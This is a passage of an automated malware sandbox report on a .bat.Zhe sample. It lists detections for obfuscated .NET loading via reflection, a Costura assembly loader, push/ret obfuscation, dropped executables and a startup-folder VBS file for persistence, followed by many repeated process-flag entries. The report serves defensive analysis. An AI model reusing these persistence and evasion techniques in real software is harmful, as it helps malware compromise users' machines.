Source:	Binary string: powershell.pdb source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000000.2230623116.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, ChannelUris.bat.Zhe, 00000013.00000000.2381194622.0000000000248000.00000020.00000001.01000000.00000009.sdmp, ChannelUris.bat.Zhe.17.dr, 87M9Y3P4Z7.bat.Zhe.5.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, FOOWUJHFfF8folaxFXM.cs	.Net Code: Type.GetTypeFromHandle(oBaXCmDfWWcAesiu78d.TwjRpFSZyR(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(oBaXCmDfWWcAesiu78d.TwjRpFSZyR(16777252)),Type.GetTypeFromHandle(oBaXCmDfWWcAesiu78d.TwjRpFSZyR(16777284))})
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, FOOWUJHFfF8folaxFXM.cs	.Net Code: Type.GetTypeFromHandle(oBaXCmDfWWcAesiu78d.TwjRpFSZyR(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(oBaXCmDfWWcAesiu78d.TwjRpFSZyR(16777252)),Type.GetTypeFromHandle(oBaXCmDfWWcAesiu78d.TwjRpFSZyR(16777284))})

.NET source code contains potential unpacker

Source: 7.2.87M9Y3P4Z7.bat.Zhe.6687238.8.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6687238.8.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6687238.8.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6687238.8.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6687238.8.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 7.2.87M9Y3P4Z7.bat.Zhe.8820000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.ChannelUris.bat.Zhe.6a58920.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.ChannelUris.bat.Zhe.6966d00.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.ChannelUris.bat.Zhe.68750d8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.87M9Y3P4Z7.bat.Zhe.60525e8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2288766679.0000000008820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2262903919.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2415826466.00000000052F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2444515974.0000000006783000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 87M9Y3P4Z7.bat.Zhe PID: 5128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ChannelUris.bat.Zhe PID: 4892, type: MEMORYSTR

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_028BA306 push ecx; retf	7_2_028BA312
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_088CBEEA push eax; retf	7_2_088CBF09
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_089B62EC push cs; iretd	7_2_089B62EF
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_08C380FC push E8080A53h; ret	7_2_08C38101
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_08C3615B push E8080A6Ah; iretd	7_2_08C36160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00C4EF9E pushad ; ret	8_2_00C4EFA5
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_04B1A30C push ecx; retf	19_2_04B1A312
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_093A4C09 pushad ; retf	19_2_093A4C0F
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_093A62EC push cs; iretd	19_2_093A62EF

Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, WpavyhD7EdUgfohP8Q0.cs	High entropy of concatenated method names: 'x0lDIWOJpP', 'PYJDheQoZC', 'qX9DPCkq92', 'rpoDndqSOs', 'mi8D2tqBZW', 'uCWDXQiVFI', 'WoyD32l1sa', 'oDSDyiJoUq', 'bQUDtuo6Cl', 'eCaDpKrHeM'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, AssemblyLoader.cs	High entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'LNJUmKKgiEWpS3nf41K'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, O8kqMFCgVIxy7aV2MlK.cs	High entropy of concatenated method names: 'UGgCoSw2Xg', 'MiECLK9Gnk', 'EvMCseW9Tw', 'P30CuTvX6n', 'HjcCeqxioJ', 'wZdCGsSouu', 'WSvCA9ZNYT', 'VKpCjMm3kW', 'nGBCxne5ZF', 'M7OCmUInOE'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, FP9HXVDzuMtAk48UHIk.cs	High entropy of concatenated method names: 'QbpGdQMsbW', 'HaNGqHJRRm', 'quHGWEPGf3', 'q9PGcg9bQD', 'HtAGUTTqog', 'th2G80WvN7', 'KEqGT8jHHm', 'jm7LQSXx7F', 'lFmG03jtau', 'PHRGfhJIiH'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, xbmPegaf9KeWIvGwLCh.cs	High entropy of concatenated method names: 'EEAawvM3QK', 'UaEai4Affs', 'PA9aFWbc3U', 'eo2a7E2BDF', 'kqLalSOiJM', 'GSBlJW7uNO7wrtZOCKO', 'nSOhQ27eUbE7PgYfLIT', 'PhqnoX7GHVPpkLH2pA9', 'Fp68nC7Ac5o1lae9SAD', 'tPb9kt7jH22saShNlQX'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, FOOWUJHFfF8folaxFXM.cs	High entropy of concatenated method names: 'TKv1NeKS1Bq7hJBUAxg', 'yPdp3HKVgdh6L9BdWMs', 'dRQDDtJpFn', 'XhqX9WK1AMV76NFMVQa', 'Ruvnx2KbM33fSjqyToG', 'n3n0ErKYmo2TVfv3Tvg', 'Symsy8KIevtTd1C9H04', 'ejJrOCKhN8HmCidYKyl', 'pqlM1lKPSyijR4iNnMi', 'WTLbZBKnXl8GpFQPXoF'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, oBaXCmDfWWcAesiu78d.cs	High entropy of concatenated method names: 'TwjRpFSZyR', 'fqRRzGLZIr', 'YJQecBSHy6aftJHspfN', 'rcDrRNSo6nGXWSc5Sx1', 'QAxJMTSDcZgGDEKEIhl', 'kjjip2SLmVhKUX6b8r7', 'Nc4UYMSOobNvoFvXIYr', 'xDDCd2SsoCdub0SgZCD'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, JY5VB4HeaHM7YahREUb.cs	High entropy of concatenated method names: 'JxGHA16xkG', 'uGaHjt4DFn', 'Lft5oRklBRJsWW8IsbI', 'mClYeskkk999JqicWO2', 'dWNTVdkKZaqRyEAYZ5V', 'KwSrw3kSvj86fYCUOLG', 'scDMJ0kVimaBaXVQus6', 'o9hTNwkBWY5hQDDj3tT', 'R3IkShk5INwtodlKrpW'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, WpavyhD7EdUgfohP8Q0.cs	High entropy of concatenated method names: 'x0lDIWOJpP', 'PYJDheQoZC', 'qX9DPCkq92', 'rpoDndqSOs', 'mi8D2tqBZW', 'uCWDXQiVFI', 'WoyD32l1sa', 'oDSDyiJoUq', 'bQUDtuo6Cl', 'eCaDpKrHeM'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, AssemblyLoader.cs	High entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'LNJUmKKgiEWpS3nf41K'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, O8kqMFCgVIxy7aV2MlK.cs	High entropy of concatenated method names: 'UGgCoSw2Xg', 'MiECLK9Gnk', 'EvMCseW9Tw', 'P30CuTvX6n', 'HjcCeqxioJ', 'wZdCGsSouu', 'WSvCA9ZNYT', 'VKpCjMm3kW', 'nGBCxne5ZF', 'M7OCmUInOE'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, FP9HXVDzuMtAk48UHIk.cs	High entropy of concatenated method names: 'QbpGdQMsbW', 'HaNGqHJRRm', 'quHGWEPGf3', 'q9PGcg9bQD', 'HtAGUTTqog', 'th2G80WvN7', 'KEqGT8jHHm', 'jm7LQSXx7F', 'lFmG03jtau', 'PHRGfhJIiH'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, xbmPegaf9KeWIvGwLCh.cs	High entropy of concatenated method names: 'EEAawvM3QK', 'UaEai4Affs', 'PA9aFWbc3U', 'eo2a7E2BDF', 'kqLalSOiJM', 'GSBlJW7uNO7wrtZOCKO', 'nSOhQ27eUbE7PgYfLIT', 'PhqnoX7GHVPpkLH2pA9', 'Fp68nC7Ac5o1lae9SAD', 'tPb9kt7jH22saShNlQX'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, FOOWUJHFfF8folaxFXM.cs	High entropy of concatenated method names: 'TKv1NeKS1Bq7hJBUAxg', 'yPdp3HKVgdh6L9BdWMs', 'dRQDDtJpFn', 'XhqX9WK1AMV76NFMVQa', 'Ruvnx2KbM33fSjqyToG', 'n3n0ErKYmo2TVfv3Tvg', 'Symsy8KIevtTd1C9H04', 'ejJrOCKhN8HmCidYKyl', 'pqlM1lKPSyijR4iNnMi', 'WTLbZBKnXl8GpFQPXoF'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, oBaXCmDfWWcAesiu78d.cs	High entropy of concatenated method names: 'TwjRpFSZyR', 'fqRRzGLZIr', 'YJQecBSHy6aftJHspfN', 'rcDrRNSo6nGXWSc5Sx1', 'QAxJMTSDcZgGDEKEIhl', 'kjjip2SLmVhKUX6b8r7', 'Nc4UYMSOobNvoFvXIYr', 'xDDCd2SsoCdub0SgZCD'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, JY5VB4HeaHM7YahREUb.cs	High entropy of concatenated method names: 'JxGHA16xkG', 'uGaHjt4DFn', 'Lft5oRklBRJsWW8IsbI', 'mClYeskkk999JqicWO2', 'dWNTVdkKZaqRyEAYZ5V', 'KwSrw3kSvj86fYCUOLG', 'scDMJ0kVimaBaXVQus6', 'o9hTNwkBWY5hQDDj3tT', 'R3IkShk5INwtodlKrpW'

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\xcopy.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe	Jump to behavior

Drops PE files

Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe			Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe			Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe			Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe			Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs

Jump to dropped file

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs

Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
